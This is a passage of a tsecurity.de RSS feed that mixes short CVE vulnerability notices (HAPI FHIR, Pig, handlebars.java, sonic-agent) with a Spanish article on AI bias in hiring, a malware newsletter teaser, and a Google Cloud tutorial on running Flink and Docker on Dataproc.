<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/hapifhir:hapi_fhir">hapifhir HAPI FHIR up to 6.9.9</a>. The affected element is the function <code>saxonTransform</code> of the file <em>org/hl7/fhir/utilities/XsltUtilities.java</em> of the component <em>XsltUtilities</em>. Such manipulation leads to xml external entity reference.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-55471">CVE-2026-55471</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[El potencial de la IA para contaminar los procesos de selección con sesgos]]></title>
<description><![CDATA[Resulta difícil encontrar un área de la empresa moderna en la que la inteligencia artificial (IA) no haya encontrado aplicación, y los procesos de selección tecnológica no son una excepción. Una encuesta de MyPerfectResume revela que el 73% de los empleadores afirma utilizar IA en las decisiones ...]]></description>
<link>https://tsecurity.de/de/3664858/it-nachrichten/el-potencial-de-la-ia-para-contaminar-los-procesos-de-seleccin-con-sesgos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664858/it-nachrichten/el-potencial-de-la-ia-para-contaminar-los-procesos-de-seleccin-con-sesgos/</guid>
<pubDate>Mon, 13 Jul 2026 12:03:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Resulta difícil encontrar un área de la empresa moderna en la que la inteligencia artificial (IA) no haya encontrado aplicación, y los procesos de selección tecnológica no son una excepción. Una encuesta de MyPerfectResume revela que el 73% de los empleadores afirma utilizar IA en las decisiones de contratación, mientras que el 52% la emplea para decisiones relacionadas con la reestructuración organizativa y la planificación de puestos.</p>



<p>Por otro lado, los candidatos también recurren cada vez más a estas herramientas. Según datos de SAP, el 52% de las personas que buscan empleo actualmente utiliza IA para apoyar su proceso de búsqueda, principalmente para mejorar los materiales de candidatura (85%) y prepararse para entrevistas (73%).</p>



<p>Jasmine Escalera, experta en carreras profesionales de Zety, plataforma especializada en orientación laboral y creación de currículums, considera que “la tecnología puede ayudar a las empresas a ser más eficientes, pero las decisiones de contratación siguen beneficiándose del criterio humano, especialmente cuando la experiencia de un candidato requiere un contexto que los sistemas automatizados de evaluación no siempre son capaces de comprender”.</p>



<p>Está claro que la IA ya forma parte esencial del proceso de contratación. Por ello, las organizaciones deben definir una estrategia clara sobre cómo utilizarla en el futuro, abordando cuestiones como los sesgos en la selección, la transparencia y el equilibrio adecuado entre la intervención humana y la asistencia tecnológica.</p>



<h2 class="wp-block-heading">Identificar las señales de alerta</h2>



<p>La IA promete aportar eficiencia tanto a candidatos como a empleadores, pero una excesiva dependencia de la tecnología puede generar consecuencias no deseadas. Los datos de MyPerfectResume muestran además que el 65% de los encuestados considera que la IA rechaza automáticamente a candidatos antes de que una persona llegue a revisar sus solicitudes, mientras que un 14% afirma que la IA descarta de entrada a más de la mitad de los aspirantes.</p>



<p>Asimismo, el 47% cree que la tecnología ha dejado fuera del proceso a candidatos que, de otro modo, habrían avanzado en la selección. Además, el 51% asegura utilizar IA para identificar perfiles considerados de riesgo, como profesionales percibidos como <em>job hoppers</em> —personas con frecuentes cambios de empleo— o candidatos con interrupciones en su trayectoria laboral.</p>



<p>Según Escalera, marcar a determinados candidatos como riesgosos y descartarlos antes de que un reclutador revise su currículum puede excluir perfiles cuya experiencia profesional cuenta una historia más compleja de lo que un algoritmo está preparado para interpretar. Por ejemplo, quienes regresan al mercado laboral tras un periodo de ausencia pueden aportar capacidades valiosas que no encajan fácilmente en los criterios automatizados de evaluación.</p>



<p>También preocupa que la IA descarte a profesionales que desean cambiar de sector o que cuentan con cualificaciones que no se reflejan exactamente en el lenguaje utilizado en una oferta de empleo, impidiendo que un reclutador humano llegue siquiera a revisar su candidatura.</p>



<p>Laurie Cure, directora ejecutiva de la consultora Innovative Connections, afirma haber observado casos en los que la IA ha eliminado a candidatos altamente cualificados, pero más nerviosos durante las entrevistas, que necesitaban más tiempo del previsto por el sistema para responder a una pregunta. También señala situaciones en las que los aspirantes utilizan un lenguaje diferente al que la IA está programada para detectar, lo que impide que sean recomendados para continuar en el proceso.</p>



<p>Además, ha constatado escenarios en los que la IA utiliza datos históricos para identificar patrones asociados a empleados considerados exitosos, priorizando determinadas universidades, trayectorias profesionales, antigüedad o características similares. Aunque estos elementos no constituyen necesariamente un sesgo en sí mismos, pueden perpetuar la creencia de que existe una correlación directa entre dichos factores y el rendimiento profesional, algo que a menudo no se sostiene.</p>



<p>Por ello, añade Cure, es esencial que las personas sigan formando parte activa de estos procesos, aportando contexto, intuición, matices y la capacidad de detectar potencial en los candidatos, algo que la IA todavía no puede replicar.</p>



<p>Y dice: “Creo que estamos permitiendo que la IA se convierta en el proceso, cuando debería limitarse a apoyarlo para hacer que la contratación sea mejor”.</p>



<h2 class="wp-block-heading">Priorizar la precisión frente a la velocidad</h2>



<p>Para Cure, uno de los principales problemas es que muchas organizaciones han perdido el equilibrio adecuado. En lugar de utilizar la IA como complemento al trabajo humano, la emplean para realizar la mayor parte, o incluso la totalidad, del cribado curricular.</p>



<p>Las empresas que implementan IA únicamente para acelerar determinadas fases del proceso, sin valorar previamente si realmente aportará beneficios, corren el riesgo de introducir sesgos no deseados.</p>



<p>“Esto permite gestionar grandes volúmenes de candidaturas y aporta una mayor consistencia en la aplicación de los criterios de selección, pero probablemente deja fuera a muchos buenos candidatos”, señala, para añadir: “El componente humano debe desempeñar un papel muy activo en la definición de los requisitos de los puestos para evitar que sean excesivamente restrictivos. Las organizaciones deben prestar atención a cómo instruyen a la IA para realizar su trabajo y ser cautelosas al definir los criterios de evaluación y filtrado”.</p>



<p>En última instancia, la IA no es una herramienta que pueda implantarse y olvidarse, ni debería contemplarse únicamente como un mecanismo para ganar eficiencia, ya que muchos procesos continúan beneficiándose —e incluso dependen— del juicio humano.</p>



<p>Por ello, resulta fundamental realizar auditorías periódicas de los sistemas de IA utilizados en contratación y recordar que el uso de estas tecnologías no exime a las organizaciones de sus obligaciones legales y éticas en materia de igualdad de oportunidades laborales. Esto hace que el equilibrio entre intervención humana y automatización sea aún más relevante.</p>



<h2 class="wp-block-heading">Transparencia y confianza de los candidatos</h2>



<p>La irrupción de la IA también ha introducido un factor de desconfianza en los procesos de selección. Los empleadores no siempre tienen claro hasta qué punto los candidatos han recurrido a herramientas de IA, mientras que los aspirantes desconocen en muchos casos cómo se utiliza exactamente esta tecnología durante la contratación.</p>



<p>Los candidatos saben que las empresas están incorporando IA a sus procesos, pero a menudo desconocen el alcance de su utilización y en qué momento pueden esperar interactuar con una persona.</p>



<p>“Esa falta de claridad puede generar escepticismo y frustración, especialmente en un mercado laboral que ya resulta extremadamente competitivo”, explica Escalera. A su juicio, “el objetivo no debería ser convencer a los candidatos de que la IA no se utiliza, sino ayudarles a comprender cómo la tecnología sirve de apoyo a la toma de decisiones, en lugar de sustituir el criterio humano que hay detrás de ellas”.</p>



<p>Como recomendación, Cure propone que las organizaciones comiencen elaborando un mapa completo de su proceso de contratación, identificando cada una de sus fases. Esto permite visualizar con claridad dónde la IA aporta valor y en qué puntos sigue siendo necesaria la intervención humana.</p>



<p>Las empresas pueden acabar dependiendo excesivamente de la IA o, por el contrario, dedicar recursos humanos a tareas que podrían automatizarse y destinarse a actividades de mayor valor añadido.</p>



<p>“Las personas aportan una comprensión más amplia de la trayectoria profesional de un candidato y tienen la capacidad de detectar cuándo alguien posee el potencial necesario para evolucionar dentro de un puesto. También son capaces de interpretar trayectorias profesionales no convencionales y motivaciones personales con mayor precisión que la IA. Por su parte, la IA aporta consistencia, eficiencia, estandarización de criterios y un nivel de objetividad beneficioso para el proceso. Si logramos combinar eficazmente ambos elementos en los puntos adecuados, la contratación sale reforzada, no debilitada”, concluye Cure.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15512 | pig-mesh Pig up to 3.9.2 pig-codegen GeneratorServiceImpl.java code injection (EUVD-2026-43253)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in pig-mesh Pig up to 3.9.2. Affected by this issue is some unknown functionality of the file \pig-master\pig-visual\pig-codegen\src\main\java\com\pig4cloud\pig\codegen\service\impl\GeneratorServiceImpl.java of the component pig-codegen....]]></description>
<link>https://tsecurity.de/de/3664153/sicherheitsluecken/cve-2026-15512-pig-mesh-pig-up-to-392-pig-codegen-generatorserviceimpljava-code-injection-euvd-2026-43253/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664153/sicherheitsluecken/cve-2026-15512-pig-mesh-pig-up-to-392-pig-codegen-generatorserviceimpljava-code-injection-euvd-2026-43253/</guid>
<pubDate>Mon, 13 Jul 2026 05:38:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/pig-mesh:pig">pig-mesh Pig up to 3.9.2</a>. Affected by this issue is some unknown functionality of the file <em>\pig-master\pig-visual\pig-codegen\src\main\java\com\pig4cloud\pig\codegen\service\impl\GeneratorServiceImpl.java</em> of the component <em>pig-codegen</em>. Such manipulation leads to code injection.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-15512">CVE-2026-15512</a>. It is possible to launch the attack remotely. Furthermore, an exploit is available.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-55760 | jknack handlebars.java up to 4.5.1 Template Loader compile path traversal]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in jknack handlebars.java up to 4.5.1. Impacted is the function compile of the component Template Loader. Such manipulation leads to path traversal.

This vulnerability is traded as CVE-2026-55760. The attack may be launched remotely. There is n...]]></description>
<link>https://tsecurity.de/de/3664010/sicherheitsluecken/cve-2026-55760-jknack-handlebarsjava-up-to-451-template-loader-compile-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664010/sicherheitsluecken/cve-2026-55760-jknack-handlebarsjava-up-to-451-template-loader-compile-path-traversal/</guid>
<pubDate>Mon, 13 Jul 2026 02:35:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/jknack:handlebars">jknack handlebars.java up to 4.5.1</a>. Impacted is the function <code>compile</code> of the component <em>Template Loader</em>. Such manipulation leads to path traversal.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-55760">CVE-2026-55760</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-Agenten retten 1999er Java-Applets und machen neue Visualisierungen möglich]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Terence Tao nutzt KI-Coding-Agenten, um 27 Jahre alten Java-1.0-Code in Stunden nach JavaScript zu portieren und dabei sogar zwei zuvor übersehene Bugs zu finden. Besonders relevant ist sein Vertrauensrahmen: Agenten dürfen nur dann laufen, wenn Fehler schnell erke...]]></description>
<link>https://tsecurity.de/de/3663852/it-security-nachrichten/ki-agenten-retten-1999er-java-applets-und-machen-neue-visualisierungen-moeglich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663852/it-security-nachrichten/ki-agenten-retten-1999er-java-applets-und-machen-neue-visualisierungen-moeglich/</guid>
<pubDate>Sun, 12 Jul 2026 23:05:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacy-code-porting-tao.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacy-code-porting-tao.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacy-code-porting-tao-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacy-code-porting-tao-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacy-code-porting-tao-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacy-code-porting-tao-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacy-code-porting-tao-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Terence Tao nutzt KI-Coding-Agenten, um 27 Jahre alten Java-1.0-Code in Stunden nach JavaScript zu portieren und dabei sogar zwei zuvor übersehene Bugs zu finden. Besonders relevant ist sein Vertrauensrahmen: Agenten dürfen nur dann laufen, wenn Fehler schnell erkennbar, sichtbar und folgenarm bleiben. Damit liefert der Mathematiker eine greifbare Blaupause […]</p>
<div><a href="https://www.it-boltwise.de/ki-agenten-retten-1999er-java-applets-und-machen-neue-visualisierungen-moeglich.html">... den vollständigen Artikel <strong>»KI-Agenten retten 1999er Java-Applets und machen neue Visualisierungen möglich«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/ki-agenten-retten-1999er-java-applets-und-machen-neue-visualisierungen-moeglich.html">KI-Agenten retten 1999er Java-Applets und machen neue Visualisierungen möglich</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15496 | SonicCloudOrg sonic-agent up to 2.7.2 Groovy Script GroovyScriptImpl.java evalIsFailed os command injection (EUVD-2026-43218)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in SonicCloudOrg sonic-agent up to 2.7.2. The impacted element is the function evalIsFailed of the file sonic-agent/src/main/java/org/cloud/sonic/agent/tests/script/GroovyScriptImpl.java of the component Groovy Script Handler. The manipula...]]></description>
<link>https://tsecurity.de/de/3663558/sicherheitsluecken/cve-2026-15496-soniccloudorg-sonic-agent-up-to-272-groovy-script-groovyscriptimpljava-evalisfailed-os-command-injection-euvd-2026-43218/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663558/sicherheitsluecken/cve-2026-15496-soniccloudorg-sonic-agent-up-to-272-groovy-script-groovyscriptimpljava-evalisfailed-os-command-injection-euvd-2026-43218/</guid>
<pubDate>Sun, 12 Jul 2026 18:11:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/soniccloudorg:sonic-agent">SonicCloudOrg sonic-agent up to 2.7.2</a>. The impacted element is the function <code>evalIsFailed</code> of the file <em>sonic-agent/src/main/java/org/cloud/sonic/agent/tests/script/GroovyScriptImpl.java</em> of the component <em>Groovy Script Handler</em>. The manipulation results in os command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-15496">CVE-2026-15496</a>. The attack can be launched remotely. Moreover, an exploit is present.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 105]]></title>
<description><![CDATA[Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter Novel Java-Based QuimaRAT Targets Windows, macOS, and Linux   Vibe Coded Extortion: Avalon’s Path from Legal Lure to CrownX Ransom…
Read more →
...]]></description>
<link>https://tsecurity.de/de/3663503/it-security-nachrichten/security-affairs-malware-newsletter-round-105/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663503/it-security-nachrichten/security-affairs-malware-newsletter-round-105/</guid>
<pubDate>Sun, 12 Jul 2026 17:23:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter Novel Java-Based QuimaRAT Targets Windows, macOS, and Linux   Vibe Coded Extortion: Avalon’s Path from Legal Lure to CrownX Ransom…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/security-affairs-malware-newsletter-round-105/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/security-affairs-malware-newsletter-round-105/">SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 105</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15495 | SonicCloudOrg sonic-agent up to 2.7.2 Android WebSocket Server AndroidWSServer.java path os command injection (EUVD-2026-43217)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in SonicCloudOrg sonic-agent up to 2.7.2. The affected element is an unknown function of the file AndroidWSServer.java of the component Android WebSocket Server. The manipulation of the argument path leads to os command injection. This vulnerab...]]></description>
<link>https://tsecurity.de/de/3663477/sicherheitsluecken/cve-2026-15495-soniccloudorg-sonic-agent-up-to-272-android-websocket-server-androidwsserverjava-path-os-command-injection-euvd-2026-43217/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663477/sicherheitsluecken/cve-2026-15495-soniccloudorg-sonic-agent-up-to-272-android-websocket-server-androidwsserverjava-path-os-command-injection-euvd-2026-43217/</guid>
<pubDate>Sun, 12 Jul 2026 17:08:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/soniccloudorg:sonic-agent">SonicCloudOrg sonic-agent up to 2.7.2</a>. The affected element is an unknown function of the file <em>AndroidWSServer.java</em> of the component <em>Android WebSocket Server</em>. The manipulation of the argument <em>path</em> leads to os command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-15495">CVE-2026-15495</a>. The attack can be initiated remotely. Additionally, an exploit exists.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15497 | SonicCloudOrg sonic-agent up to 2.7.2 JWT Authentication Filter ExchangeController.java code injection (EUVD-2026-43219)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in SonicCloudOrg sonic-agent up to 2.7.2. This affects an unknown function of the file sonic-server-controller/src/main/java/org/cloud/sonic/controller/controller/ExchangeController.java of the component JWT Authentication Filter. This manipul...]]></description>
<link>https://tsecurity.de/de/3663471/sicherheitsluecken/cve-2026-15497-soniccloudorg-sonic-agent-up-to-272-jwt-authentication-filter-exchangecontrollerjava-code-injection-euvd-2026-43219/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663471/sicherheitsluecken/cve-2026-15497-soniccloudorg-sonic-agent-up-to-272-jwt-authentication-filter-exchangecontrollerjava-code-injection-euvd-2026-43219/</guid>
<pubDate>Sun, 12 Jul 2026 17:08:51 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/soniccloudorg:sonic-agent">SonicCloudOrg sonic-agent up to 2.7.2</a>. This affects an unknown function of the file <em>sonic-server-controller/src/main/java/org/cloud/sonic/controller/controller/ExchangeController.java</em> of the component <em>JWT Authentication Filter</em>. This manipulation causes code injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-15497">CVE-2026-15497</a>. The attack may be initiated remotely. In addition, an exploit is available.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 105]]></title>
<description><![CDATA[Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter Novel Java-Based QuimaRAT Targets Windows, macOS, and Linux   Vibe Coded Extortion: Avalon’s Path from Legal Lure to CrownX Ransom Capabilities ...]]></description>
<link>https://tsecurity.de/de/3663382/hacking/security-affairs-malware-newsletter-round-105/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663382/hacking/security-affairs-malware-newsletter-round-105/</guid>
<pubDate>Sun, 12 Jul 2026 16:08:17 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter Novel Java-Based QuimaRAT Targets Windows, macOS, and Linux   Vibe Coded Extortion: Avalon’s Path from Legal Lure to CrownX Ransom Capabilities Armored Likho digging a snake pit: inside the covert BusySnake Stealer campaign   RedWing: A […]]]></content:encoded>
</item>
<item>
<title><![CDATA[New Dataproc optional components support Apache Flink and Docker]]></title>
<description><![CDATA[Google Cloud’s Dataproc lets you run native Apache Spark and Hadoop clusters on Google Cloud in a simpler, more cost-effective way. In this blog, we will talk about our newest optional components available in Dataproc’s Component Exchange: Docker and Apache Flink.Docker container on DataprocDocke...]]></description>
<link>https://tsecurity.de/de/3662840/it-security-nachrichten/new-dataproc-optional-components-support-apache-flink-and-docker/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662840/it-security-nachrichten/new-dataproc-optional-components-support-apache-flink-and-docker/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Google Cloud’s Dataproc lets you run native Apache Spark and Hadoop clusters on Google Cloud in a simpler, more cost-effective way. In this blog, we will talk about our newest optional components available in Dataproc’s Component Exchange: Docker and Apache Flink.</p><h3>Docker container on Dataproc</h3><p>Docker is a widely used container technology. Since it’s now a Dataproc optional component, Docker daemons can now be installed on every node of the Dataproc cluster. This will give you the ability to install containerized applications and interact with Hadoop clusters easily on the cluster. </p><p>In addition, Docker is also critical to supporting these features:</p><ol><li><p>Running containers with YARN</p></li><li><p>Portable Apache Beam job</p></li></ol><p>Running containers on YARN allows you to manage dependencies of your YARN application separately, and also allows you to create containerized services on YARN. <a href="https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/DockerContainers.html" target="_blank">Get more details here.</a> Portable Apache Beam packages jobs into Docker containers and submits them the Flink cluster. Find <a href="https://beam.apache.org/roadmap/portability/" target="_blank">more detail about Beam portability</a>. </p><p>Docker optional component is also configured to use <a href="https://cloud.google.com/container-registry">Google Container Registry</a>, in addition to the default Docker registry. This lets you use container images managed by your organization.</p><p>Here is how to create a Dataproc cluster with the Docker optional component:</p><p><code>gcloud beta dataproc clusters create &lt;cluster-name&gt; \</code><br><code>  --optional-components=DOCKER \</code><br><code>  --image-version=1.5</code></p><p>When you run the Docker application, the log will be streamed to Cloud Logging, using gcplogs driver.</p><p>If your application does not depend on any Hadoop services, check out <a href="https://kubernetes.io/" target="_blank">Kubernetes</a> and <a href="https://cloud.google.com/kubernetes-engine/docs/quickstart">Google Kubernetes Engine</a> to run containers natively. For more on using Dataproc, <a href="https://cloud.google.com/dataproc/docs">check out our documentation</a>.</p><h3>Apache Flink on Dataproc</h3><p>Among streaming analytics technologies, Apache Beam and Apache Flink stand out. Apache Flink is a distributed processing engine using stateful computation. <a href="https://beam.apache.org/get-started/beam-overview/" target="_blank">Apache Beam</a> is a unified model for defining batch and steaming processing pipelines. Using <a href="https://beam.apache.org/documentation/runners/flink/" target="_blank">Apache Flink as an execution engine</a>, you can also run Apache Beam jobs on Dataproc, in addition to Google’s Cloud Dataflow service.</p><p>Flink and running Beam on Flink are suitable for large-scale, continuous jobs, and provide:</p><ul><li><p>A streaming-first runtime that supports both batch processing and data streaming programs</p></li><li><p>A runtime that supports very high throughput and low event latency at the same time</p></li><li><p>Fault-tolerance with exactly-once processing guarantees</p></li><li><p>Natural back-pressure in streaming programs</p></li><li><p>Custom memory management for efficient and robust switching between in-memory and out-of-core data processing algorithms</p></li><li><p>Integration with YARN and other components of the Apache Hadoop ecosystem</p></li></ul><p>Our Dataproc team here at Google Cloud recently announced that <a href="https://cloud.google.com/blog/products/data-analytics/open-source-processing-engines-for-kubernetes">Flink Operator on Kubernetes</a> is now available. It allows you to run Apache Flink jobs in Kubernetes, bringing the benefits of reducing platform dependency and producing better hardware efficiency. </p><p><b>Basic Flink Concepts</b></p><p>A Flink cluster consists of a Flink JobManager and a set of Flink TaskManagers. Like similar roles in other distributed systems such as YARN, JobManager has responsibilities such as accepting jobs, managing resources and supervising jobs. TaskManagers are responsible for running the actual tasks. </p><p>When running Flink on Dataproc, we use YARN as resource manager for Flink. You can run Flink jobs in 2 ways: job cluster and session cluster. For the job cluster, YARN will create JobManager and TaskManagers for the job and will destroy the cluster once the job is finished. For session clusters, YARN will create JobManager and a few TaskManagers.The cluster can serve multiple jobs until being shut down by the user.</p><p><b>How to create a cluster with Flink</b></p><p>Use this command to get started:</p><p><code>gcloud beta dataproc clusters create &lt;cluster-name&gt; \</code><br><code>  --optional-components=FLINK \</code><br><code>  --image-version=1.5</code></p><p><b>How to run a Flink job</b></p><p>After a Dataproc cluster with Flink starts, you can submit your Flink jobs to YARN directly using the Flink job cluster. After accepting the job, Flink will start a JobManager and slots for this job in YARN. The Flink job will be run in the YARN cluster until finished. The JobManager created will then be shut down. Job logs will be available in regular YARN logs. Try this command to run a word-counting example:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'HADOOP_CLASSPATH=`hadoop classpath` flink run -m yarn-cluster /usr/lib/flink/examples/batch/WordCount.jar'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8374c0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>The Dataproc cluster will not start a <a href="https://ci.apache.org/projects/flink/flink-docs-release-1.10/ops/deployment/yarn_setup.html#flink-yarn-session" target="_blank">Flink Session</a> cluster by default. Instead, Dataproc will create the script “/usr/bin/flink-yarn-daemon,” which will start a Flink session. </p><p>If you want to start a Flink session when Dataproc is created, use the metadata key to allow it:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'gcloud dataproc clusters create &lt;cluster-name&gt; \\\r\n    --optional-components=FLINK \\ \r\n    --image-version=1.5 \\\r\n    --metadata flink-start-yarn-session=true'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837580&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>If you want to start the Flink session after Dataproc is created, you can run the following command on master node:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ . /usr/bin/flink-yarn-daemon'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8375e0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Submit jobs to that session cluster. You’ll need to get the Flink JobManager URL:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'HADOOP_CLASSPATH=`hadoop classpath` flink run -m &lt;JOB_MANAGER_HOSTNAME&gt;:&lt;REST_API_PORT&gt; /usr/lib/flink/examples/batch/WordCount.jar'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837640&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><b>How to run a Java Beam job</b></p><p>It is very easy to run an Apache Beam job written in Java. There is no extra configuration needed. As long as you package your Beam jobs into a JAR file, you do not need to configure anything to run Beam on Flink. This is the command you can use:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ mvn package -Pflink-runner\r\n$ bin/flink run -c org.apache.beam.examples.WordCount /path/to/your.jar\r\n--runner=FlinkRunner --other-parameters'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8376a0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><b>How to run a Python Beam job written in Python</b></p><p>Beam jobs written in Python use a different execution model. To run them in Flink on Dataproc, you will also need to enable the Docker optional component. Here’s how to create a cluster:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'gcloud dataproc clusters create &lt;cluster-name&gt; \\\r\n    --optional-components=FLINK,DOCKER'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837700&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will also need to install necessary Python libraries needed by Beam, such as apache_beam and apache_beam[gcp]. You can pass in a Flink master URL to let it run in a session cluster. If you leave the URL out, you need to use the job cluster mode to run this job:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
